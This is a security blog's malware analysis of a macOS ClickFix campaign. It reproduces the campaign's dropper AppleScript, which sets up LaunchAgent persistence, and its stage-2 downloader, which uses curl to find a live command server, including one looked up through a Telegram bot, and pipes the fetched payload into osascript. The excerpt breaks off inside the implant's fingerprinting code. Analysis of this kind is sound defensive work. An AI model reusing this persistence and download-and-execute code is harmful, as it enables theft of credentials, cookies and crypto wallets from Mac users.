Malware Insights: MacOS Phexia Campaign | Cookie Engineer's Weblog

About

About Me

About My Work

Cookie's Conf Talks

Cookie's CTF Writeups

Cookie's Weblog

Cookie's Wiki

Contact Me

Hardware

Anet A8

Gameboy Advance

Hackberry Pi

Switchine

Cyber Defense

Antispam

Antibote

RogueBerry One 🚧

Tholian Convoy 🔒

Tholian Detective 🔒

Tholian Firewall 🔒

Tholian Guard 🔒

Tholian Intel 🔒

Tholian Stealth 🔒

Tholian Warps

Cyber Security

DNS Proxy 🚧

DNS Query

Forensics Tools

GoRoot 🚧

StegIt

Dev Ops

Agenda

Git EVAC

Git Identity

GoLPM

Golocron

Gooey Framework 🚧

Gooey CLI 🚧

i3 BrightnessCTL

Pacman Backup

Pwettify

RetroKit

ZIMdex 🚧

Tutorials

AI #1: Flappy Evolution

AI #2: Reinforced Pong

AI #3: Pong Evolution

Archive

DNS Proxy

GIBook Editor

Git Work

jQuery Desktop

lychee.js Breeder

lychee.js Engine

lychee.js Fertilizer

lychee.js Harvester

Polyfillr Framework

Webmail.me

Webslide.me

Zynga Jukebox

Zynga Speedrun

Browser Extensions

Defiant

GitHub Scrumboard

Me Want Cookies

GNOME Extensions

Outta Space

Malware Insights : MacOS Phexia Campaign

I got nerdsniped today. Some compromised website wanted me to execute a command<br>in the<br>Terminal.app<br>because I've set my User-Agent to a randomized profile and<br>it was a MacOS Browser.

Overview

CNC domains : x2db.cx , a5db.ch , a6b6.biz , kfcnevkusno.one

CNC bots : t.me/neverfakebot

CNC networks : Cloudflare

Target OS : MacOS

Target Apps : (All) crypto wallets, (All) Browsers, Password extensions, Keychains, Browser Cookies, Browser History, Telegram Auth Data

Botnet Operator : (Unconfirmed by third-parties) APT28

Stage 1 : Clickfix Attack

A compromised website asks you to execute a Clickfix payload via<br>Cmd + C<br>and<br>Cmd + V<br>right into the<br>Terminal.app<br>, having copied the downloader's script<br>command already into your clipboard.

The initial payload for the downloader was obfuscated with<br>base64<br>encoding and<br>does a<br>curl request<br>to download and execute an<br>osascript<br>file which caught<br>my curiosity.

osascript -e "$(echo "... base64encoded ..." | base64 -d)"

Dropper Source Code

do shell script "<br>SCRIPT_PATH=\"$HOME/Library/pwvrskwjcwvtcrjr\";<br>mkdir -p \"$HOME/Library/LaunchAgents\";<br>cat > \"$HOME/Library/LaunchAgents/com.components.pwvrskwjcwvtcrjr.plist\"

Label<br>com.launch.pwvrskwjcwvtcrjr<br>ProgramArguments

/usr/bin/osascript<br>$SCRIPT_PATH

RunAtLoad

END_PLIST<br>do shell script "echo \"...base64encoded_implant_downloader...\" | base64 -d > ~/Library/pwvrskwjcwvtcrjr"<br>do shell script "launchctl unload ~/Library/LaunchAgents/com.components.pwvrskwjcwvtcrjr.plist 2>/dev/null"<br>do shell script "launchctl load ~/Library/LaunchAgents/com.components.pwvrskwjcwvtcrjr.plist"

Dropper Summary

Installs a RunAtLoad configuration to ~Library/LaunchAgents/com.components..plist

Installs a LaunchAgent via launchctl load

Downloads and executes second stage payload to ~/Library/

Stage 2 : Control Server Connection and Implant Downloader Loop

The<br>CNC<br>connection loop is implemented with another<br>osascript<br>which<br>also requests new domains via a Telegram Bot that is owned by the Botnet operator.

Downloader

property domainsList : {"example.com", "another-example.com", "etc-pp.com" }<br>property activeDomain: ""<br>property btxid: "campaign-identifier"

on setDomain()<br>repeat with d in domainsList<br>set domain to (contents of d)<br>set urlresult to "http://" & domain & "/api.php?check"<br>set actualurl to "http://" & domain & "/"<br>try<br>set response to do shell script "/usr/bin/curl -s --connect-timeout 5 --max-time 10 " & quoted form of urlresult<br>if response is "success" then<br>set activeDomain to actualurl<br>return true<br>end if<br>end try<br>end repeat<br>try<br>set domain to do shell script "curl -s --connect-timeout 5 --max-time 10 https://t.me/botnet-bot-with-statusmessage | sed -n 's/.*\\([^.*/\\1/p'"<br>set urlresult to "http://" & domain & "/api.php?check"<br>set actualurl to "http://" & domain & "/"<br>set response to do shell script "curl -s --connect-timeout 5 --max-time 10 " & quoted form of urlresult<br>if response is "success" then<br>set activeDomain to actualurl<br>return true<br>end if<br>end try<br>return false<br>end setDomain

if setDomain() then<br>set startsrc to "curl -s " & quoted form of (activeDomain & "get.php?txid=" & btxid) & " | osascript"<br>do shell script startsrc<br>end if

Downloader Summary

Checks the Botnet Operator owned Telegram Bot for changed CNC server domains

Requests /api.php?check and /get.php?txid=... to download malware implant

Downloads and executes third stage malware implant

Stage 3 : Malware Implant

The Malware Implant is a little more sophisticated than initially expected.

UUID Fingerprinting

on getUUID()<br>set methods to {"ioreg -rd1 -c IOPlatformExpertDevice | awk -F'\"' '/IOPlatformUUID/{print $4}'", "ioreg -rd1 -c IOPlatformExpertDevice | grep -o '\"IOPlatformUUID\"[^,]*' | cut -d'\"' -f4", "system_profiler SPHardwareDataType 2>/dev/null | awk '/UUID/{print $NF}'", "system_profiler SPHardwareDataType 2>/dev/null | grep -i 'uuid' | awk '{print...